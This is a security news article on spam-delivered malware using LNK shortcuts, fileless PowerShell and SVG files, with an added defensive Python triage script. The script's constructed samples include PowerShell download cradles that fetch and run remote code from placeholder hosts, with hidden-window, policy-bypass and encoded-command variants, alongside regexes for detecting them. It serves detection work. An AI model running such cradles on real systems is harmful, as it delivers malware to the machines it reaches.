Cybercriminals Switch File Types to Infect More Organizations with Malware
During the past year, spam volume increased considerably, as did the percentage of those emails that were malicious. The increase in malicious messages coincided with increased botnet activity. Botnets are now being used to send large-scale malware and ransomware campaigns. While spam email delivery of malware may have fallen out of favor in recent years, that is clearly no longer the case.
Microsoft’s Malware Protection Center has identified one campaign that uses LNK (Windows shortcut) files to launch a script that attempts to download Locky from five different domains. “The use of multiple domains and the technique of storing the rest of the URL as a parameter is a way to circumvent URL filtering solutions. All the script needs is one URL that is not blocked in order to successfully download malware,” warns Microsoft.
Not all campaigns deliver a malicious executable. Fileless malware is becoming more popular: because PowerShell scripts run directly in memory, no payload needs to be written to disk, and the malicious code remains resident in memory only. Endpoint security products that rely on scanning files on disk are therefore unlikely to detect these fileless attacks.
Organizations can raise the bar against these attacks by setting the PowerShell execution policy to Restricted, but the execution policy is not a security boundary: it is easily bypassed, for example by passing -ExecutionPolicy Bypass on the command line or by feeding the script to PowerShell as an encoded command, and the scripts still run. Logging PowerShell activity (script block logging) and reviewing process command lines for download-cradle patterns is a more reliable control than the execution policy alone.
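Both techniques above (hosts and URL fragments stored separately so that no complete URL appears in the script, and in-memory PowerShell download cradles) leave traces in process command lines and PowerShell script block logs. The following triage script is an added example, not code from the article or from Microsoft: it decodes an -EncodedCommand payload, flags the usual cradle indicators (including the execution-policy bypass flag itself), and rebuilds the candidate download URLs when the host list and the path are split across string literals. The sample command lines, the indicator heuristics and the *.example domain names are all constructed for illustration.

```python
import base64
import re

# Heuristic indicators typical of PowerShell download cradles and fileless loaders
# (assumed patterns, not a vendor signature set).
INDICATORS = {
    "invoke-expression": re.compile(r"\b(iex|invoke-expression)\b", re.I),
    "web-download": re.compile(r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|net\.webclient", re.I),
    "execution-policy-bypass": re.compile(r"-(ep|ex|exec|executionpolicy)\s+bypass\b", re.I),
    "hidden-window": re.compile(r"-(w|win|windowstyle)\s+hidden\b", re.I),
    "noprofile": re.compile(r"-nop(rofile)?\b", re.I),
    "base64-inline": re.compile(r"frombase64string", re.I),
}
ENCODED_CMD = re.compile(r"-(e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)
FULL_URL = re.compile(r"https?://[A-Za-z0-9.-]+\.[A-Za-z]{2,}(?:[/?#][^\s'\"]*)?", re.I)
SINGLE_QUOTED = re.compile(r"'([^']*)'")
DOUBLE_QUOTED = re.compile(r'"([^"]*)"')
HOSTNAME = re.compile(r"^[A-Za-z0-9-]+(\.[A-Za-z0-9-]+)*\.[A-Za-z]{2,}$")


def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand payload (base64 of UTF-16LE text), or None."""
    m = ENCODED_CMD.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(2)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def reconstruct_urls(script):
    """Rebuild download URLs when hosts and path are separate literals.

    A plain URL regex finds nothing in such a script, because 'http://' + $host + $path
    is only concatenated at run time; here every host literal is paired with every path literal.
    """
    literals = SINGLE_QUOTED.findall(script) + DOUBLE_QUOTED.findall(script)
    hosts = [s for s in literals if HOSTNAME.match(s)]
    paths = [s for s in literals if s.startswith("/")]
    scheme = "https" if re.search(r"https://", script, re.I) else "http"
    return [f"{scheme}://{h}{p}" for h in hosts for p in paths]


def triage(cmdline):
    """Return (sorted indicator names, candidate download URLs) for one command line or script block."""
    decoded = decode_encoded_command(cmdline)
    # Strip the base64 blob before pattern matching so it cannot produce spurious hits,
    # then analyse the decoded text alongside the visible command line.
    text = ENCODED_CMD.sub(" ", cmdline)
    if decoded:
        text += "\n" + decoded
    hits = [name for name, rx in INDICATORS.items() if rx.search(text)]
    if decoded:
        hits.append("encoded-command")
    urls = FULL_URL.findall(text) or reconstruct_urls(text)
    return sorted(hits), urls


# Constructed sample 1: arguments a shortcut might pass to powershell.exe, modelled on the
# "several hosts, path stored separately" pattern. Domains are placeholders.
LNK_ARGS = (
    "-nop -w hidden -ep bypass -c \"$p='/files/load.php?id=7';"
    "$h='site-a.example','site-b.example','site-c.example';"
    "foreach($x in $h){try{IEX (New-Object Net.WebClient)"
    ".DownloadString('http://'+$x+$p);break}catch{}}\""
)
# Constructed sample 2: the same cradle hidden behind -EncodedCommand.
ENCODED_PLAINTEXT = "IEX (New-Object Net.WebClient).DownloadString('http://site-d.example/a.ps1')"
ENCODED_CMDLINE = "powershell.exe -NoP -NonI -W Hidden -Enc " + base64.b64encode(
    ENCODED_PLAINTEXT.encode("utf-16-le")).decode()
# Constructed sample 3: an ordinary administrative invocation that should stay quiet.
BENIGN_CMDLINE = r"powershell.exe -File C:\Scripts\backup.ps1"

if __name__ == "__main__":
    for label, sample in (("lnk", LNK_ARGS), ("encoded", ENCODED_CMDLINE), ("benign", BENIGN_CMDLINE)):
        hits, urls = triage(sample)
        print(f"{label}: indicators={hits} urls={urls}")
```

The script runs offline on the embedded samples; in practice the same functions would be fed the CommandLine field of process-creation events or the ScriptBlockText of PowerShell 4104 events. Reconstructing every host/path combination deliberately over-approximates: the goal is to produce a blocklist candidate for each domain the script could reach, since, as Microsoft notes, one unblocked domain is enough for the download to succeed.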
SVG image files, which can carry embedded script, are also being used, and although they are in common legitimate use, organizations should consider blocking this image type from delivery via email as well. If such images do need to be exchanged, policies can require that they be shared through other channels, such as Google Drive or Dropbox.